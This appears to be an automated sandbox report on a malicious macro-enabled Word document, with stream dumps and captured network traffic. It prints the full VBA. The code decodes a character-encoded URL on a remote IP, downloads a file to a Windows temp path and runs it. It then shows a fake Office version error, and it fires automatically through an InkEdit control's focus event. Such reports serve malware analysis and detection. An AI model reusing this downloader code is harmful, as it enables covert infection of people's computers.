File Content Preview:	PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	2

OLE File "word/vbaProject.bin"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 7919

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	7919
Data ASCII:	. . . . . . . . . . . . . . . . . P . . . . . . . . . . . a . . . . . . . . . . . H _ . . . . . . . . . . . . . . . . . . . . ( . . . . . 6 . . . . . . . . . . . . . . . . . U R L D o w n l o a d T o F i l e A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . .
Data Raw:	01 16 01 00 06 18 01 00 00 0c 10 00 00 fc 00 00 00 50 02 00 00 ff ff ff ff d1 13 00 00 61 1b 00 00 00 00 00 00 01 00 00 00 48 5f c7 b0 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 36 02 14 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 00 80 ff ff ff ff 01 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
#Else
Title
"urlmon"
Shell
Object
Long)
Long,
"ation
mess,
myArray
PtrSafe
"ported
Declare
dwReserved
"soft
String,
String)
Split(decoded,
pCaller
String
applic"
version
appears
ByVal
Please
(ByVal
format.
"URLDownloadToFileA"
URLDownloadToFile
Msg(mess)
newer
"This
Office
Attribute
szURL
MsgBox
Dc(decoded)
VB_Name
suite.
Function
author
szFileName
document
product
Code:
lpfnCB
Alias
Micro"
older

VBA Code

Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon"         Alias "URLDownloadToFileA" (ByVal pCaller As Long,                                     ByVal szURL As String, ByVal szFileName As String,                                     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon"         Alias "URLDownloadToFileA" (ByVal pCaller As Long,                                     ByVal szURL As String, ByVal szFileName As String,                                     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Function dwn1(v1, v2)
    URLDownloadToFile 0, v1, v2, 0, 0
End Function
Sub St()
    Dim url1 As String
    url1 = Dc(UF1.TB1.Text)
    Dim path1 As String
    path1 = Dc(UF1.TB2.Text)
    Dim obj1 As Object
    If IsObject(obj1) = True Then
        dwn1 url1, path1
    End If

    St1 path1
    
    mess = "This applic" & "ation appears to ha" & "ve been made with an older version of the Micro" & "soft Office product suite. Please have the author save this document to a newer and sup" & "ported format. [Er" & "ror Code: -21" & "9]"
    Msg mess
End Sub
Sub Msg(mess)
    MsgBox mess, 16, Title
End Sub
Function Dc(decoded)
    myArray = Split(decoded, ",", -1)
    Dc = Dc2(myArray)
End Function

Function Dc2(a1)
    Dim b1 As String
    Dim s1 As String
    lb1 = LBound(a1)
    ub1 = UBound(a1)
    For o1 = lb1 To ub1
        b1 = Chr(a1(o1))
        s1 = s1 + b1
    Next o1
    Dc2 = s1
End Function

Function St1(v1 As String)
    If VarType(v1) = 8 Then
        Shell v1
    End If
End Function

VBA File Name: ThisDocument.cls, Stream Size: 1792

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1792
Data ASCII:	. . . . . ! . . . . . . . . . . . Y . . . K . . . e . . . . . . . . . . . . . . . H _ . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . G % . . h . . A . . . . u . . ] . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . j . . F . k . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . I n k 1 , 0 , 0 , I N K E D L i b , I n k E d i t . . . . . j . . F . k . . . . < . G % . . h . . A . . . . u . . ] .
Data Raw:	01 16 01 00 06 21 01 00 00 dd 04 00 00 05 01 00 00 59 02 00 00 4b 05 00 00 65 05 00 00 f5 05 00 00 00 00 00 00 01 00 00 00 48 5f d5 12 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 44 00 ff ff 00 00 47 25 99 9e 68 d8 9f 41 a1 f7 03 bb 75 9e e3 5d 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Name
VB_Creatable
VB_Exposed
InkEdit"
VB_Customizable
VB_Control
INKEDLib,
VB_TemplateDerived
"ThisDocument"
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Ink1, 0, 0, INKEDLib, InkEdit"
Private Sub Ink1_GotFocus()
    St
End Sub

VBA File Name: UF1.frm, Stream Size: 1712

General
Stream Path:	VBA/UF1
VBA File Name:	UF1.frm
Stream Size:	1712
Data ASCII:	. . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . \\ n . . f . . A . } . . & . . X > . . . x . ~ N . , . . . r 1 . } . w . . . A A . . . . . . . f . . . . 1 . . . . d . E . . . t . i C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . 1 . . . . d . E . . . t . i C \\ n . . f . . A . } . . & . . X . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 00 01 00 00 70 04 00 00 e4 00 00 00 84 02 00 00 9e 04 00 00 c4 04 00 00 98 05 00 00 02 00 00 00 01 00 00 00 48 5f b0 cc 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 44 00 ff ff 00 00 5c 6e 8d e7 66 d9 c2 41 99 7d d0 1d 26 b2 b9 58 3e a1 ec 08 78 b9 7e 4e 91 2c 9a f1 8c 72 31 2e 7d e8 77 10 f8 f7 41 41 84 c0 a6 e8 e2

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UF1"
Attribute VB_Base = "0{B99EA3B4-BAF5-4E1D-A5A2-9A2A4E8082E0}{4ADC8F2A-C37A-4327-9721-3242DE16CC9E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	533
Entropy:	5.19108006164
Base64 Encoded:	True
Data ASCII:	I D = " { 3 C F 9 D 4 0 9 - 8 9 1 4 - 4 6 7 E - B 6 4 F - 5 1 D 8 3 E 9 D 5 A F B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . B a s e C l a s s = U F 1 . . M o d u l e = M o d u l e 1 . . N a m e = " T e m p l a t e P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 9 D B D C E 4 E 0 E 4 E 0 E 4 E 0 E 4 E 0 " . . D P B = " B 2 B 0 B 7 6 C 9 1 6 D 9 1 6 D 9 1 " . . G C = " 8 B 8 9 8 E 5 7 6 6
Data Raw:	49 44 3d 22 7b 33 43 46 39 44 34 30 39 2d 38 39 31 34 2d 34 36 37 45 2d 42 36 34 46 2d 35 31 44 38 33 45 39 44 35 41 46 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 42 61 73 65 43 6c 61 73 73 3d 55 46 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 54 65 6d 70 6c 61 74 65 50 72 6f 6a

Stream Path: PROJECTwm, File Type: data, Stream Size: 77

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	77
Entropy:	3.32568256746
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U F 1 . U . F . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 46 31 00 55 00 46 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: UF1/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	UF1/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: UF1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 285

General
Stream Path:	UF1/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	285
Entropy:	4.5719641546
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U F 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 4 6 5 0 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 7 5 . . C l i e n t W i d t h = 4 5 3 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . .
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 46 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 34 36 35 30

Stream Path: UF1/f, File Type: data, Stream Size: 179

General
Stream Path:	UF1/f
File Type:	data
Stream Size:	179
Entropy:	3.69784726661
Base64 Encoded:	False
Data ASCII:	. . ( . H . . . . . . . . @ . . . . . . . . . . . } . . 6 . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . L . . . . . . o . . . . . . . . . . . . . . . . . . . . . . . T B 1 . { . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . T B 2 . { . . . 1 . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 28 00 48 0c 10 0c 03 00 00 00 04 40 00 00 ff ff 00 00 06 00 00 00 00 7d 00 00 36 1f 00 00 0a 20 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 02 00 00 00 4c 00 00 00 00 82 01 6f 00 00 20 00 e5 01 00 00 03 00 00 80 01 00 00 00 ac 00 00 00 00 00 17 00 54 42 31 06 7b 02 00 00 7b 02 00 00 00

Stream Path: UF1/o, File Type: data, Stream Size: 332

General
Stream Path:	UF1/o
File Type:	data
Stream Size:	332
Entropy:	3.94712709489
Base64 Encoded:	False
Data ASCII:	. . . . . . @ . . . . . . H . . s . . . u . . . . . . . 1 0 4 , 1 1 6 , 1 1 6 , 1 1 2 , 5 8 , 4 7 , 4 7 , 4 9 , 4 8 , 5 2 , 4 6 , 4 9 , 5 4 , 5 6 , 4 6 , 4 9 , 5 7 , 5 6 , 4 6 , 5 0 , 4 8 , 5 6 , 4 7 , 1 1 9 , 1 1 1 , 1 1 4 , 1 0 0 , 1 1 7 , 1 1 2 , 1 0 0 , 4 6 , 1 1 6 , 1 0 9 , 1 1 2 . . . . . 5 . . . . . . . . . . . . . . . T a h o m a 1 . . . . . . . @ . . . . . . H . . f . . . u . . . ; . . . 6 7 , 5 8 , 9 2 , 8 7 , 1 0 5 , 1 1 0 , 1 0 0 , 1 1 1 , 1 1 9 , 1 1 5 , 9 2 , 8 4 , 1 0 1 , 1 0 9 , 1 1 2 , 9 2
Data Raw:	00 02 8c 00 01 01 40 80 00 00 00 00 1b 48 80 ac 73 00 00 80 75 1a 00 00 eb 0c 00 00 31 30 34 2c 31 31 36 2c 31 31 36 2c 31 31 32 2c 35 38 2c 34 37 2c 34 37 2c 34 39 2c 34 38 2c 35 32 2c 34 36 2c 34 39 2c 35 34 2c 35 36 2c 34 36 2c 34 39 2c 35 37 2c 35 36 2c 34 36 2c 35 30 2c 34 38 2c 35 36 2c 34 37 2c 31 31 39 2c 31 31 31 2c 31 31 34 2c 31 30 30 2c 31 31 37 2c 31 31 32 2c 31 30 30

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4590

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4590
Entropy:	4.6591106601
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 6 . \\ .
Data Raw:	cc 61 85 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 28 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3523

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	3523
Entropy:	4.69838773558
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a 85 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 03 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 393

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	393
Entropy:	3.27512550773
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p C a l l e r . . . . . . . . s z U R L . . . . . . . . s z F i l e N a m e . . . . . . . . d w R e s e r v e d . . . . . . . . l p f n C B . . . . . . . . v 1 . . . . . . . . v 2 . . . . . . . . m e s s . . . . . . . . d e c o d e d . . . . . . . . a 1 . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 75 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 07 00 09 00 00 00 00 00 05 00 09 00 00 00 00 00 03 00 02 00 00 08 07 00 00 00 70 43 61 6c 6c 65 72 02 00 00 08 05 00 00 00 73 7a 55 52 4c 03 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 1474

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	1474
Entropy:	4.08730207094
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . Y . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 07 00 06 00 1b 00 00 00 f8 00 00 00 00 00 00 00 09 00 00 00 00 00 04 00 d1 0a 00 00 00 00 00 00 b9 0d 00 00 00 00 00 00 f9 00 00 00 00 00 02 00 61 12 00 00 00 00 00 00 81 00 00 00 00 00 02 00 49 01 00 00 00 00

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 424

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	424
Entropy:	2.50202291831
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . a . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / / $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 3c 00 e9 09 00 00 00 00 00 00 00 00 00 70 14 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 61 00 00 00 00 00 01 00 79 00 00 00 00 00 01 00 91 00 00 00 00 00 01 00 b1 00 00 00 00 00 01 00 d1 00 00 00 00 00 01 00 00 00 00 00

Stream Path: VBA/__SRP_4, File Type: data, Stream Size: 624

General
Stream Path:	VBA/__SRP_4
File Type:	data
Stream Size:	624
Entropy:	2.24556180604
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . I . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . a . . . . . . . i . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 e8 00 00 00 00 00 00 00 02 00 02 00 00 00 00 00 02 00 01 00 00 00 03 00 f9 0a 00 00 00 00 00 00 21 0b 00 00 00 00 00 00 49 0b 00 00 00 00 00 00 71 0b 00 00 00 00 00 00 ff ff ff ff d1 0a 00 00 00 00 00 00 08 00 10 00 34 00 00 00 99 0b 00 00 00 00 00 00 49 01

Stream Path: VBA/__SRP_5, File Type: data, Stream Size: 140

General
Stream Path:	VBA/__SRP_5
File Type:	data
Stream Size:	140
Entropy:	2.24072265582
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 48 00 00 00 04 00 24 00 01 01 00 00 00 00 04 00 00 00 03 60 00 00 98 01 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 24 00 41 01 00 00 00 00 04 00 01 00 03 60 00 00 9c 01 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 00 00

Stream Path: VBA/__SRP_6, File Type: data, Stream Size: 460

General
Stream Path:	VBA/__SRP_6
File Type:	data
Stream Size:	460
Entropy:	2.47614313644
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . Y . . . . . . . . . . . y . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 07 00 58 02 00 00 00 00 00 00 01 00 01 00 01 00 00 00 a9 00 00 00 00 00 02 00 01 00 01 00 00 00 02 00 31 17 00 00 00 00 00 00 c9 14 00 00 00 00 00 00 59 17 00 00 00 00 00 00 ff ff ff ff 79 14 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 19 15 00 00 00 00 00 00 89 01

Stream Path: VBA/__SRP_7, File Type: data, Stream Size: 142

General
Stream Path:	VBA/__SRP_7
File Type:	data
Stream Size:	142
Entropy:	2.49128617601
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . 8 . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 06 00 ff ff ff ff ff ff ff ff 00 00 00 00 48 00 00 00 04 00 24 00 b9 01 00 00 00 00 06 00 00 00 03 60 00 00 c4 06 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 01 00 20 00 c9 01 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 03 40 02 00 b8 06 1d e1 01 00 00 00 00 01 00 38 00

Stream Path: VBA/dir, File Type: data, Stream Size: 1031

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	1031
Entropy:	6.57214991329
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . T e m p l a t e . P r o j e c t . Q . H . . @ . . . . . = . . . . . \| . . . . . . . . . . ] . _ . . . . J . < . . . . . 9 s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . 0 . . . . E O f f i c . E . O . f . . i . c . E . . . . . . . . E 2 D F . 8
Data Raw:	01 03 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0f 00 1c 00 54 65 6d 70 6c 61 74 65 00 50 72 6f 6a 65 63 74 05 51 00 48 00 00 40 02 0a 06 02 0a 3d ad 02 0a 07 02 7c 01 14 08 06 12 09 02 12 80 dd 5d 9d 5f 08 00 0c 02 4a 12 3c 02 0a 16 00 01 39 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e

OLE File "word/activeX/activeX1.bin"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: Contents, File Type: data, Stream Size: 489

General
Stream Path:	Contents
File Type:	data
Stream Size:	489
Entropy:	3.37243391832
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . E . F . A . U . L . T . . . . . . . + . . . . . . . . . D B . . . M S S a n s S e r i f . . . . . . . . . . . . . . . . . . . J . . . { . \\ . r . t . f . 1 . \\ . a . n . s . i . \\ . a . n . s . i . c . p . g . 1 . 2 . 5 . 1 . \\ . d . e . f . f . 0 . \\ . d . e . f . l . a . n . g . 1 . 0 . 4 . 9 . { . \\ . f . o . n . t . t . b
Data Raw:	02 00 00 00 00 00 00 00 e9 01 00 00 00 00 00 00 34 12 cd ab 7f 00 00 00 7f 00 00 00 05 00 00 80 01 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 d0 07 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 44 00 45 00 46 00 41 00 55 00 4c 00 54 00 00 00 00 00 00 00 2b 00 00 00 01 cc 00 00 90 01 44 42 01 00 0d 4d 53 20 53 61

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2019 14:02:48.360317945 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.546806097 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.546986103 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.561966896 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.748445034 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749274015 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749313116 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749438047 CET	80	49163	104.168.198.208	192.168.1.16
